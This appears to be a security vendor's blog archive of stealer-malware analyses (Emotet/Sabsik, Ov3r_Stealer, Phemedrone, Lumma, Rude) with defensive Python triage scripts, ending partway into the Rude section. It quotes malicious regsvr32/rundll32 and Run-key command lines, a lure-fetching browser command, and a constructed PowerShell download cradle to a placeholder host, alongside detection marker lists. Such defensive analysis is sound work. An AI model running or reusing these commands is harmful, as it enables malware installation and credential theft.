Stealer Archives – Gridinsoft Blog
https://gridinsoft.com/blogs/tag/stealer/
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.
Last updated: Thu, 07 Mar 2024 09:15:25 +0000

Trojan:Script/Sabsik.fl.A!ml Analysis & Removal Guide
https://gridinsoft.com/blogs/trojanscript-sabsik-fl-aml-analysis-removal/
Thu, 07 Mar 2024 09:15:25 +0000

Trojan:Script/Sabsik.fl.A!ml is a generic detection name used by Microsoft Defender. This name is particularly used to denote stealer malware that also possesses dropper capabilities. It can perform various activities of the attacker’s choice on the victim’s computer, such as spying, data theft, remote control and installation of other viruses. In this article, we will tell you how to analyze, detect and remove this trojan from your computer.

What is Trojan:Script/Sabsik.fl.A!ml?

Trojan:Script/Sabsik.fl.A!ml is a detection name used by Microsoft Defender (Windows Defender). It particularly covers stealer malware that is also capable of other activities, for instance deploying other malware.

Image: request to move a lure file to the MS Office root directory (Emotet lure document)

Typically, the trojans detected as Sabsik are distributed through email spam. The attachments contain a hidden script that downloads and runs the malware once macros are enabled, so users who open these files infect themselves without realizing it. Some samples can also self-propagate through SMB vulnerabilities, such as the one targeted by the EternalBlue exploit (MS17-010).

Trojan Sabsik Threat Analysis

Probably the best-known malware family detected as Trojan:Script/Sabsik.fl.A!ml is the Emotet Trojan. Even though Emotet is now close to extinct, the link between this signature and that family gives an excellent clue as to what you can expect when Sabsik is running in the system.

Launch and Detection Evasion

Emotet (detected as Sabsik) uses a variety of techniques to avoid detection by antivirus software and to make sure it runs on the target system. The malware is typically heavily packed and obfuscated, which makes it hard for traditional signature-based antivirus to spot. To launch, it hands its DLL to trusted, signed Windows utilities (regsvr32.exe and rundll32.exe), a living-off-the-land trick that MITRE ATT&CK classes as System Binary Proxy Execution (T1218.010 and T1218.011) rather than true DLL side-loading:

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\007852768570c1d9528259e7e52aecf5e4ae97dadd75a459cc53f9acca65054d.dll
– registers the malware DLL (regsvr32 calls the DLL’s exported DllRegisterServer function).

C:\Windows\SysWOW64\rundll32.exe "C:\Users\Admin\AppData\Local\Temp\007852768570c1d9528259e7e52aecf5e4ae97dadd75a459cc53f9acca65054d.dll",DllRegisterServer
– launches the same export through rundll32.

Modules

Emotet is modular malware, meaning it can extend its functionality by loading additional modules. Not all Sabsik samples possess modularity, but it is an increasingly common feature in modern malware. Some of the common modules associated with this threat include:

  • Stealer Module – used for stealing banking credentials and other sensitive information.
  • Hardware Module – collects detailed information about the infected system.
  • XMRig Module – utilized for cryptocurrency mining purposes.
  • Advanced Email Stealer Module – steals email credentials and contact lists.
  • SMB Lateral Movement Module – enables lateral movement within a network by exploiting SMB vulnerabilities.
  • Traffic Proxying (UPnP) Module – turns infected hosts into proxies for C2 traffic, using UPnP to expose them on the network.

Establishing Persistence & Data Stealing

After infecting the system, Sabsik registers itself for autostart so that it is launched every time the system boots, maintaining its foothold across reboots. It creates a string value (REG_SZ, since the data is a command line, not a DWORD) under the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run key with the following contents:

C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Tzusqvzhnftw\gwwfpucmcdt.ruj
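The two execution command lines and the Run value above share features a hunter can key on: a DLL executed through regsvr32/rundll32 from a user-writable folder, a module whose file name is a bare SHA-256, and an autostart entry that loads a "DLL" with a made-up extension (.ruj) from a randomly named directory. The following Python is an added example, not GridinSoft's or Emotet's code: it tokenises Windows command lines, applies those checks, and runs them over constructed Sysmon-style process events and Run values modelled on the ones quoted in this post. The folder markers and extension list are assumptions for illustration, not a complete policy.

```python
import re
from pathlib import PureWindowsPath

# Signed Windows utilities that Emotet/Sabsik uses to run its DLL (ATT&CK T1218.010 regsvr32, T1218.011 rundll32).
PROXY_BINARIES = {"regsvr32.exe", "rundll32.exe"}
# Extensions a module handed to those utilities normally carries; anything else is worth a look.
NORMAL_MODULE_EXT = {".dll", ".ocx", ".cpl", ".ax"}
# User-writable folders in which a legitimate COM server rarely lives (assumed list for this example).
USER_WRITABLE_MARKERS = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\downloads\\", "\\users\\public\\")


def split_cmdline(cmdline):
    """Tokenise a Windows command line, keeping double-quoted paths whole."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def binary_name(token):
    """Base name of the executable in a command-line token, with .exe added if it was omitted."""
    name = PureWindowsPath(token).name.lower()
    return name if name.endswith(".exe") else name + ".exe"


def extract_module(tokens):
    """The module path passed to regsvr32/rundll32: the first argument that is not a switch."""
    for tok in tokens[1:]:
        if tok.startswith(("/", "-")):
            continue
        return tok.split(",", 1)[0]          # rundll32 form is module,ExportName
    return None


def triage_proxy_exec(cmdline):
    """Reasons to suspect a regsvr32/rundll32 command line; an empty list means nothing notable."""
    tokens = split_cmdline(cmdline)
    if not tokens or binary_name(tokens[0]) not in PROXY_BINARIES:
        return []
    module = extract_module(tokens)
    if module is None:
        return []
    path = PureWindowsPath(module.lower())
    reasons = []
    if any(marker in str(path) for marker in USER_WRITABLE_MARKERS):
        reasons.append("module loaded from a user-writable path")
    if path.suffix not in NORMAL_MODULE_EXT:
        reasons.append(f"module has a non-DLL extension ({path.suffix or 'none'})")
    if re.fullmatch(r"[0-9a-f]{64}", path.stem):
        reasons.append("module file name is a bare SHA-256 (sample straight out of a sandbox or dropper)")
    return reasons


def triage_run_value(data):
    """Same checks for an HKCU\\...\\Run value; autostart through a proxy binary is itself a finding."""
    reasons = triage_proxy_exec(data)
    if reasons:
        reasons.insert(0, "autostart value runs a module through a signed proxy binary")
    return reasons


# Constructed Sysmon-style CommandLine samples (not real telemetry); the first two and the first Run value
# mirror the command lines quoted in this post.
SAMPLE_PROCESS_EVENTS = [
    r"regsvr32 /s C:\Users\Admin\AppData\Local\Temp\007852768570c1d9528259e7e52aecf5e4ae97dadd75a459cc53f9acca65054d.dll",
    r'C:\Windows\SysWOW64\rundll32.exe "C:\Users\Admin\AppData\Local\Temp\007852768570c1d9528259e7e52aecf5e4ae97dadd75a459cc53f9acca65054d.dll",DllRegisterServer',
    r'C:\Windows\System32\regsvr32.exe /s "C:\Program Files\Vendor\vendor.ocx"',
    r"notepad.exe C:\Users\Admin\AppData\Local\Temp\notes.txt",
]
SAMPLE_RUN_VALUES = {
    "Tzusqvzhnftw": r'C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Tzusqvzhnftw\gwwfpucmcdt.ruj"',
    "OneDrive": r'"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
}


def run_demo():
    """Map every sample that produced findings to its list of reasons."""
    hits = {cmd: triage_proxy_exec(cmd) for cmd in SAMPLE_PROCESS_EVENTS}
    hits.update({val: triage_run_value(val) for val in SAMPLE_RUN_VALUES.values()})
    return {cmd: reasons for cmd, reasons in hits.items() if reasons}


if __name__ == "__main__":
    for cmd, reasons in run_demo().items():
        print(cmd, "\n   ->", "; ".join(reasons))
```

The vendor .ocx and the OneDrive autostart produce no findings, which is the point: the signal is not regsvr32 or rundll32 as such (both are used constantly by legitimate software) but the combination of the proxy binary with where the module sits and what it is called. In a real deployment the same checks map onto Sysmon Event ID 1 (process creation) and Event ID 13 (registry value set) rather than the constructed list.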

Data Collection & Other Functionality

Although its original focus was banking data, Emotet/Sabsik collects various types of sensitive information from infected systems, including usernames, passwords, system information and email credentials. Sabsik also self-propagates through email spamming and lateral movement within networks, which allows it to spread rapidly and infect multiple systems.

Malware Delivery by Emotet

Despite originally being a banking stealer, Emotet is mostly known as dropper malware. In its prime, the vast networks controlled by Emotet were used to deploy various payloads to infected systems, among them ransomware, spyware, coin miners and other types of malware. Emotet indiscriminately targets both individual users and organizations, spreading payloads according to its operators’ directives.

A command line observed alongside this activity shows the lure document being fetched through Chrome with its disk and media caches effectively disabled:

C:\Program Files\Google\Chrome\Application\chrome.exe" --disk-cache-dir=null --disk-cache-size=1 --media-cache-size=1 --disable-gpu-shader-disk-cache --disable-background-networking --disable-features=OptimizationGuideModelDownloading,OptimizationHintsFetching,OptimizationTargetPrediction,OptimizationHints "https://brooklyn.blob.core.windows.net/pen-test/MaliciousDOC.doc

Trojan:Script/Sabsik.fl.A!ml – False Positive or Not?

In some cases, Sabsik Trojan may be mistakenly detected by antivirus software if you try to run a legitimate file such as a game, application, or a driver. This can happen due to an incorrect signature, incompatibility, corruption, or file change. According to several user reports, popular games downloaded from legitimate sources may sometimes be mistakenly flagged as Trojan:Script/Sabsik.fl.A!ml.

Image: a legitimate file mistakenly detected by antivirus

One particular example comes from a Battle.net user who purchased Diablo II: Resurrected and was warned about the Sabsik Trojan when trying to launch the game. It is not hard to guess that a game released by a company as big as Blizzard would not contain malware. If you are certain that the source of your download is safe, a Sabsik Trojan notification could easily be a false positive.

It is also important to note the “!ml” suffix in the detection name. It marks a verdict produced by Microsoft Defender’s machine-learning classifier rather than by a conventional signature. This method is highly effective, but it can generate false positives when no other detection component confirms the verdict, which is why such hits deserve a second look (for example, checking the file’s hash on VirusTotal).

That said, you can rarely be 100% sure that a download source is safe. If you see a Sabsik Trojan warning after interacting with a file of unknown origin, you should definitely quarantine or remove the source of the threat.

How to remove Trojan:Script/Sabsik.fl.A!ml?

If Sabsik Trojan was detected in an untrusted file, you should definitely delete it. That alone is not enough to be sure you are safe, though: we recommend performing a full system scan with a reliable anti-malware tool such as GridinSoft Anti-Malware. Last but not least, since the family behind this detection is a stealer, change important passwords, especially those saved in browsers or email clients on the affected machine, in case they have already been exfiltrated.

Ov3r_Stealer Steals Crypto and Credentials, Exploits Facebook Job Ads
https://gridinsoft.com/blogs/ov3r_stealer-exploits-facebook-job-ads/
Thu, 08 Feb 2024 12:46:39 +0000

A new Windows malware called Ov3r_Stealer is spreading through fake Facebook job ads, according to a report by Trustwave SpiderLabs. The malware is designed to steal sensitive information and crypto wallets from unsuspecting victims. Let’s delve into the mechanics of these deceptive ads, and Ov3r_Stealer.

Ov3r_Stealer Abuses Facebook Job Ads

Scammers post elaborate job ads on Facebook. These seem legitimate at first glance and target a wide range of job seekers with the promise of lucrative opportunities. As the experts at Trustwave explain, the intruders use a PDF file that masquerades as a legitimate document hosted on OneDrive. Prospective victims are lured into clicking an “Access Document” button embedded in the PDF, which initiates a chain of malicious events.

Image: malicious Facebook job advertisement

The Ov3r_Stealer infection chain is built to compromise a system, persist on it, and collect credentials and cryptocurrency. Otherwise a fairly classic infostealer, it draws attention mainly because of its unusual propagation route. The chain runs as follows:

1. Initial Access

To direct the victim to the lure PDF, a fake Facebook account posing as Amazon CEO Andy Jassy is created with a link to OneDrive. After the victim clicks “Access Document” from the Facebook page, a .url file is downloaded, which starts the second step.

2. Payload Downloading

After clicking the Access Document button, the victim is served a .url file to download, masquerading as a legitimate ‘DocuSign’ document. The .url file points to an IP address hosting a data2.zip archive with a pdf2.cpl file inside. A .cpl file is a Control Panel item, which is an ordinary DLL that Windows executes (through the Control Panel binary) when it is opened, so “opening” it runs attacker code. The final payload of this malware is likewise targeted at Windows-based systems.

3. Additional Loaders

At this stage, the malware uses additional loaders or components to retrieve and execute the next stages, so that the final payload is installed and runs in the compromised environment.

4. Final Payload

The final payload consists of three files, brought in by the loader stages: WerFaultSecure.exe, Wer.dll and Secure.pdf. WerFaultSecure.exe is a legitimate Windows component, and a look-alike Wer.dll placed beside it is the classic DLL side-loading pattern, in which a trusted executable loads an attacker-supplied library by name. Once executed, the malware establishes persistence so that it is always running, and exfiltrates specific data to a Telegram channel monitored by the operators.

5. Gaining Persistence

To ensure its continued presence and operation within the compromised system, the malware establishes persistence mechanisms. This may involve modifying system settings, creating registry entries, or scheduling tasks to ensure that the malware remains active and operational even after system reboots or security scans.

6. System Surveillance & Data Collection

Once established within the compromised system, the malware begins collecting sensitive data and discovering valuable information. This stage may involve scanning the infected device for credentials, cryptocurrency wallets, and other valuable data, as well as identifying potential targets for further exploitation.

7. Data Exfiltration

The final stage of the malware operation involves exfiltrating stolen data from the compromised system to external servers or channels controlled by the attackers. This may include transmitting sensitive information such as credentials, financial data, or proprietary information to remote locations, enabling the attackers to harvest and exploit it for nefarious purposes.

Similarities with Phemedrone Stealer

Experts note that Ov3r_Stealer shares some similarities with another stealer, Phemedrone Stealer, which we covered recently. Both use the same GitHub repository (nateeintanan2527) and the same infection chain involving PDF files, URL files, CPL files and PowerShell loaders. They also exploit the same Microsoft Windows Defender SmartScreen bypass flaw (CVE-2023-36025) to evade detection. One more malicious program, dubbed Mispadu, exploits the same SmartScreen vulnerability – check out our report.

Image: the PowerShell script that fetches the fake DocuSign file (source: Trustwave)

The only serious difference between Ov3r_Stealer and Phemedrone is that the latter is written in C#, while Ov3r_Stealer is written in C++. The report suggests that Phemedrone may have been re-purposed and renamed to Ov3r_Stealer by the same or a different threat actor. Either way, such similarities are rarely a coincidence in the malware world.

How to Protect Against Malware in Ads?

Malware spread through advertisements is nothing new, so the countermeasures are well established. Because major ad providers struggle (or are unwilling) to filter malicious ads, the safest option is not to interact with them at all. If an advertised product interests you, open the vendor’s site by typing its address yourself; legitimate advertisers name their website on the banner or in its description, so you will not get lost.

A more reactive but more reliable and less demanding approach is to use advanced anti-malware software. Stealer malware relies on stealth, yet it can rarely hide its malicious activity, and that is where heuristic detection shines. With its Proactive Protection mode, GridinSoft Anti-Malware can stop infections at their very beginning.

Windows SmartScreen Vulnerability Exploited to Spread Phemedrone Stealer
https://gridinsoft.com/blogs/windows-smartscreen-vulnerability-phemedrone-stealer/
Fri, 12 Jan 2024 21:58:53 +0000

The malicious campaign exploits the CVE-2023-36025 vulnerability in Microsoft Windows Defender SmartScreen to spread Phemedrone Stealer. It utilizes intricate evasion techniques to bypass traditional security measures and target sensitive user information.

Phemedrone Stealer Campaign Exploits CVE-2023-36025

Trend Micro researchers uncovered a malware campaign exploiting the CVE-2023-36025 vulnerability in Microsoft Windows Defender SmartScreen. This campaign involves the Phemedrone Stealer, which can extract a wide range of sensitive data. Its infection chain begins with cloud-hosted malicious URL files, often disguised using URL shorteners. Upon execution, these files exploit CVE-2023-36025 to initiate the malware download.

The campaign is concentrated on social media. The attackers spread URL files that look like innocent link shortcuts. Opening one triggers a chain that ends with a request to a GitHub repository, which returns the shellcode needed to download and run the payload. Scams on such platforms are nothing new; what makes this one effective is the use of URL files, which act as a lockpick for user trust, spam filters and system protection all at once.

CVE-2023-36025: A Gateway for Cybercriminals

In a nutshell, CVE-2023-36025 is a critical vulnerability that affects Microsoft Windows Defender SmartScreen. It allows attackers to bypass security warnings and checks by manipulating Internet Shortcut (.url) files. Despite Microsoft’s patch released on November 14, 2023, cybercriminals have actively exploited the vulnerability, leading to its inclusion in the Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities (KEV) list.

In the Phemedrone campaign, the attackers evade Windows Defender SmartScreen with a control panel item (.cpl) file. Normally SmartScreen warns you when you open an Internet Shortcut downloaded from the web; the specially crafted .url variant circumvents that prompt and runs the download in the background. Further along the chain, the attackers abuse the Windows Control Panel binary to run the .cpl, which is a signed-binary proxy execution technique rather than a separate vulnerability.

Detailed Analysis

Attackers spread Phemedrone Stealer using cloud hosting and URL shorteners. They exploit CVE-2023-36025 by tricking users into opening .url files, and evade Windows Defender SmartScreen through a .cpl file executed via the Control Panel binary (MITRE ATT&CK T1218.002, System Binary Proxy Execution: Control Panel). The .cpl is a DLL loader that calls Windows PowerShell to download the next loader from GitHub. The second-stage loader, Donut, can execute various types of files in memory; the final stealer targets multiple applications and services to collect sensitive information.
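Both the Ov3r_Stealer chain (step 2 above) and this Phemedrone campaign start from an Internet Shortcut whose target is a .cpl, in Ov3r_Stealer’s case nested inside a ZIP on a remote host. As an added example that is not part of Trend Micro’s or Trustwave’s reports, the Python below parses the INI-style .url format and flags the traits those chains rely on: a remote target with a code-bearing extension, a target nested inside an archive (Explorer browses ZIPs as folders), a double extension, and an IconFile on a remote host. The sample .url contents are constructed; hosts are TEST-NET addresses and .invalid names, and the extension lists are my assumptions. The script recognises the lure shape, not CVE-2023-36025 itself; patching remains the fix.

```python
from urllib.parse import urlparse, unquote

# Extension lists and the checks below are assumptions for this example, not an authoritative policy.
EXECUTABLE_EXT = {".cpl", ".exe", ".dll", ".lnk", ".js", ".jse", ".vbs", ".vbe", ".hta", ".scr", ".bat", ".cmd", ".ps1", ".msi"}
ARCHIVE_EXT = {".zip", ".iso", ".img", ".7z", ".rar"}
REMOTE_SCHEMES = {"http", "https", "ftp", "file"}


def parse_url_file(text):
    """Parse the INI-style [InternetShortcut] section of a .url file into a dict with lower-cased keys."""
    fields, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("["):
            in_section = line.lower() == "[internetshortcut]"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip().lower()] = value.strip()
    return fields


def is_remote(target):
    """True for UNC paths and for URLs that name a host; file:///C:/... stays local."""
    if target.startswith("\\\\"):
        return True
    parsed = urlparse(target)
    return parsed.scheme.lower() in REMOTE_SCHEMES and bool(parsed.netloc)


def path_elements(target):
    """Path components of a URL or UNC target, percent-decoded."""
    if target.startswith("\\\\"):
        path = target[2:].replace("\\", "/")
    else:
        path = unquote(urlparse(target).path)
    return [p for p in path.split("/") if p]


def suffixes(name):
    """All suffixes of a file name: Invoice.pdf.cpl -> ['.pdf', '.cpl']."""
    return ["." + p.lower() for p in name.split(".")[1:]]


def last_suffix(name):
    s = suffixes(name)
    return s[-1] if s else ""


def triage_url_file(text):
    """Return the reasons a .url file deserves a look; an empty list means none of the checks matched."""
    fields = parse_url_file(text)
    target = fields.get("url", "")
    if not target:
        return ["no URL= field: not a usable Internet Shortcut"]
    reasons = []
    elements = path_elements(target)
    exts = suffixes(elements[-1]) if elements else []
    final = exts[-1] if exts else ""
    if is_remote(target) and final in EXECUTABLE_EXT:
        reasons.append(f"remote target is a code-bearing file ({final})")
    if any(last_suffix(e) in ARCHIVE_EXT for e in elements[:-1]):
        reasons.append("target sits inside a remote archive, which Explorer browses as a folder")
    if len(exts) >= 2 and final in EXECUTABLE_EXT:
        reasons.append(f"double extension {''.join(exts)} disguises the file type")
    if is_remote(fields.get("iconfile", "")):
        reasons.append("IconFile points to a remote host (Explorer resolves it just to draw the icon)")
    return reasons


# Constructed samples modelled on the chains described above; hosts are TEST-NET / .invalid placeholders.
SAMPLE_BENIGN = """[InternetShortcut]
URL=https://www.example.com/docs/guide.html
IconIndex=0
"""
SAMPLE_ARCHIVE_CPL = """[InternetShortcut]
URL=file://192.0.2.10/data2.zip/pdf2.cpl
IconIndex=1
"""
SAMPLE_DOUBLE_EXT = r"""[InternetShortcut]
URL=https://cdn.example.invalid/attachments/Invoice.pdf.cpl
IconFile=\\192.0.2.20\share\icon.ico
"""

if __name__ == "__main__":
    for label, sample in (("benign", SAMPLE_BENIGN), ("archive+cpl", SAMPLE_ARCHIVE_CPL), ("double-ext", SAMPLE_DOUBLE_EXT)):
        print(label, "->", triage_url_file(sample) or ["clean"])
```

Run it over a mail gateway’s quarantined attachments or a user’s Downloads folder and the two lure shapes stand out immediately, while an ordinary bookmark produces nothing. The IconFile check is there because a shortcut can cause an outbound connection before anyone clicks it, which is worth knowing even when the target itself looks harmless.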

Image: Phemedrone Stealer’s infection chain

The malware collects system information and compresses it into a ZIP archive in memory using its MemoryStream and ZipStorage classes. It then validates the Telegram bot API token and sends the compressed data to the attacker via its SendMessage and SendZip methods; SendZip submits the archive as a document attachment in an HTTP POST to the Telegram Bot API.

Mitigation and Recommendations

Attackers often find vulnerabilities faster than developers fix them, so in light of this threat we have a few recommendations:

  • Regularly update your OS, apps, and security solution. This action is crucial as developers continuously address security vulnerabilities through patches. Although the process may seem tedious, it is a necessary and proactive measure to ensure that your operating system, applications, and security solutions are equipped with the latest defenses against evolving cyber threats.
  • Be cautious with Internet Shortcut (.url) files. Exercise caution, especially when dealing with Internet Shortcut files, particularly those received from unverified sources. These files can serve as gateways for malware, making it essential to pay attention to the legitimacy of URLs before opening them to mitigate the risk of infection.
  • Implement advanced security solutions. This measure detects and neutralizes malware if it infiltrates your device. Robust security software with real-time monitoring and threat detection capabilities adds an extra layer of protection, helping identify and promptly respond to potential threats.
  • Stay informed about the risks of phishing and social engineering. These tactics often serve as the initial vectors for malware campaigns. Educate yourself and your team on recognizing phishing attempts, avoiding suspicious links, and verifying the authenticity of communications to minimize the likelihood of falling victim to such cyber threats.

YouTube Videos Promote Software Cracks With Lumma Stealer
https://gridinsoft.com/blogs/youtube-videos-cracks-lumma-stealer/
Tue, 09 Jan 2024 18:02:55 +0000

Researchers have discovered a cybersecurity threat that targets users through YouTube videos. These videos offer pirated software but are being used to distribute malware, specifically Lumma stealer.

YouTube Videos Promoting Malware

In a concerning development, researchers have identified a new threat aimed at people looking for free software via YouTube videos. The videos look harmless and offer cracked versions of popular software, but in fact they distribute a potent malware known as Lumma Stealer.

Image: video offering to download a cracked Sony Vegas

Although the video was published some time ago, it keeps gaining views. Researchers note that the file offered in the video as a cracked program is periodically updated, which suggests the operators may have started pushing malicious payloads only after the video became popular. The same approach can deliver practically any malware; Lumma is only the first.

The Attack Chain

The attack begins innocently, with users searching for cracked versions of popular software like Vegas Pro. A link in the video description tempts the user, leading to a bogus installer hosted on a service like MediaFire. But the real danger lies within. The unpacked ZIP installer contains a Windows shortcut masquerading as a setup file.

In fact, the “setup” is a .lnk file that runs a PowerShell script. From there things proceed by the textbook: the script downloads and runs the payload from a GitHub repository, a host chosen because traffic to it rarely attracts attention from firewalls and web filters.
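A “setup” that is really a .lnk launching PowerShell can be identified before anything runs, because the shortcut’s target and arguments are stored in clear text inside the file. The Python below is an added example, not code from the research cited here: it implements a minimal reader for the MS-SHLLINK header and StringData section, then flags a target that is a script host and arguments that look like a download cradle. The sample shortcut is constructed by the script itself (the builder exists only to produce test input, and the payload URL is a placeholder), and the marker list is an assumption.

```python
import struct

# Shell Link (.lnk) layout per MS-SHLLINK: fixed 76-byte header, optional IDList and LinkInfo,
# then StringData entries in a fixed order, each present only if its LinkFlags bit is set.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
                 (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon_location")]

# Script hosts and proxy binaries an installer shortcut has no reason to point at (assumed list).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "rundll32.exe", "regsvr32.exe"}
# Substrings typical of PowerShell download cradles and evasion switches (assumed, not exhaustive).
CRADLE_MARKERS = ("iex", "invoke-expression", "downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
                  "-enc", "frombase64string", "-w hidden", "-windowstyle hidden", "bypass")


def parse_lnk(data):
    """Return the StringData fields of a .lnk; this is where the real target and arguments live."""
    if len(data) < LNK_HEADER_SIZE or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:            # IDListSize (uint16) followed by the IDList itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                      # LinkInfoSize (uint32) includes its own 4 bytes
        pos += struct.unpack_from("<I", data, pos)[0]
    is_unicode = bool(flags & IS_UNICODE)
    fields = {}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, not bytes
        pos += 2
        raw = data[pos:pos + count * (2 if is_unicode else 1)]
        pos += len(raw)
        fields[name] = raw.decode("utf-16-le" if is_unicode else "cp1252")
    return fields


def triage_lnk(data):
    """Parse a shortcut and list the reasons it looks like a malicious 'setup' lure (empty list = nothing found)."""
    fields = parse_lnk(data)
    target = fields.get("relative_path") or fields.get("name") or ""
    exe = target.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    args = fields.get("arguments", "").lower()
    reasons = []
    if exe in SCRIPT_HOSTS:
        reasons.append(f"shortcut launches {exe} rather than an installer")
    hits = [m for m in CRADLE_MARKERS if m in args]
    if hits:
        reasons.append("arguments carry download-cradle/evasion markers: " + ", ".join(hits))
    return fields, reasons


def build_lnk(relative_path, working_dir, arguments):
    """Build a minimal Unicode .lnk carrying three StringData fields; used only to construct the samples here."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    # header: size, CLSID, flags, attrs, 3 timestamps, size, icon index, SW_SHOWNORMAL, hotkey, 3 reserved
    header = struct.pack("<I16sIIQQQIiIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, working_dir, arguments))
    return header + body


# Constructed samples: a lure modelled on the chain above (placeholder URL) and a plain vendor installer shortcut.
SAMPLE_LURE_LNK = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"%TEMP%",
                            '-w hidden -ep bypass -c "iwr https://example.invalid/payload.ps1 -UseBasicParsing | iex"')
SAMPLE_BENIGN_LNK = build_lnk(r"..\Program Files\Vendor\setup.exe", r"C:\Program Files\Vendor", "/silent")

if __name__ == "__main__":
    for label, blob in (("lure", SAMPLE_LURE_LNK), ("benign", SAMPLE_BENIGN_LNK)):
        fields, reasons = triage_lnk(blob)
        print(label, fields.get("relative_path"), fields.get("arguments"), reasons or "clean")
```

Real-world shortcuts usually also carry an IDList and LinkInfo block; the parser skips both by their length fields, so it reads those files too. For production use a full-featured tool such as LECmd gives the same fields plus timestamps and machine identifiers, but the point here is that nothing needs to execute to see what a lure will do.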

Image: illustrative diagram of the attack process

What is Lumma Stealer?

Lumma Stealer is an information-stealing malware written in C language. It has been available on Russian-speaking forums since August 2022 through a Malware-as-a-Service (MaaS) model. The threat actor behind this malware is believed to be “Shamel”, who operates under the alias “Lumma”. The primary targets of Lumma Stealer are cryptocurrency wallets and two-factor authentication (2FA) browser extensions.

Once the malware infiltrates the victim’s machine, it steals sensitive information. It exfiltrates it to a C2 server via HTTP POST requests using the user agent “TeslaBrowser/5.5”. Along with these features, the malware also has a non-resident loader capable of delivering additional payloads through EXE, DLL, and PowerShell.

The Lumma Stealer has a starting price of $250 per month on underground forums. The lowest plan allows users to view and upload logs and access log analysis tools. On the other hand, the most expensive plan costs US$20,000 and gives users access to the source code. It also grants them the right to sell the infostealer.

How to stay protected?

First, we recommend refraining from downloading and using pirated software, whether from torrents or any other source. It is illegal for home users and all the more so for companies, and the risks are described above. Beyond that, you can improve your protection against malware like Lumma Stealer by following these tips:

  • Avoid shady software spreading websites. Regardless of what kind of software they spread, the chance of getting infected by using one is noticeably higher. Seek a more reliable source – it will save you both time and money. To verify whether the site is legit and trustworthy, consider using GridinSoft Free Online Virus Checker.
  • Don’t click on suspicious links. Similarly to the previous advice, be cautious with links, especially in emails, social media messages, or websites. Cybercriminals often rely on human curiosity to spread malware.
  • Use anti-malware protection. Install a reliable anti-malware program and keep it up to date; it can detect threats before they harm your system. GridinSoft Anti-Malware is a security solution you can rely on.

Rude Stealer Targets Data from Gamer Platforms
https://gridinsoft.com/blogs/rude-stealer/
Sat, 25 Nov 2023 20:21:03 +0000

A newly discovered Java-based stealer named Rude has emerged, packaged as a Java Archive (JAR) file. It carries a range of capabilities and focuses on stealing sensitive data from gaming and chat platforms such as Steam and Discord, as well as from web browsers.

Rude Stealer Overview

In early November 2023, researchers identified a malicious JAR file labeled “Stealer.jar” on VirusTotal. Further analysis revealed it to be an information stealer named Rude. Unlike the more common native executables, this malware is Java-based and targets the Windows operating system. JAR files can be stealthier and may evade detection by conventional security software, with the trade-off that they only run where a Java runtime is installed.

Image: Rude Stealer capturing a system fingerprint

The primary target of Rude Stealer is tokens and IDs from popular applications like Discord and Steam. Additionally, it collects a plethora of sensitive information. Among them are passwords, cookies, browsing history, and auto-fill data from various browsers. Remarkably, this malware ignores cryptocurrency wallets, which have become a typical point of interest since 2020. The stealer is also equipped with the ability to capture screenshots, adding an extra layer to its information-gathering capabilities.

Initial Infection and Technical Analysis

While the initial infection vector remains unknown, it is clear that Rude Stealer requires manual activation by the threat actors (TAs) through command-line arguments. By passing their Telegram channel chat ID and bot token, the TAs start the stealer’s data theft. A detailed technical analysis reveals the workings of Rude Stealer, with specific class files dedicated to each operation.

Stealing Steam User Data

First of all, Rude Stealer meticulously scans the victim’s system for the Steam application directory, copies relevant files, and extracts SteamIDs. These IDs are then used to generate URLs leading to the Steam community profiles of the victims. Building on the acquired Steam user data, the stealer delves into the installed games, retrieving game names and logging this information in a designated text file.

Extracting Discord Tokens And Browser Data

Next, the stealer locates Discord-related directories, copies pertinent files, and extracts Discord tokens using regex patterns. It saves these tokens in a separate text file. Besides Discord, this stealer collects sensitive information from the following browsers: Brave, Edge, Chrome, Firefox, Opera, OperaGX, Vivaldi, and Yandex. The extracted information from different web browser databases is saved in log files. It includes:

  • Autofill
  • Credit card data
  • Cookies
  • History
  • Passwords

Capturing System Information

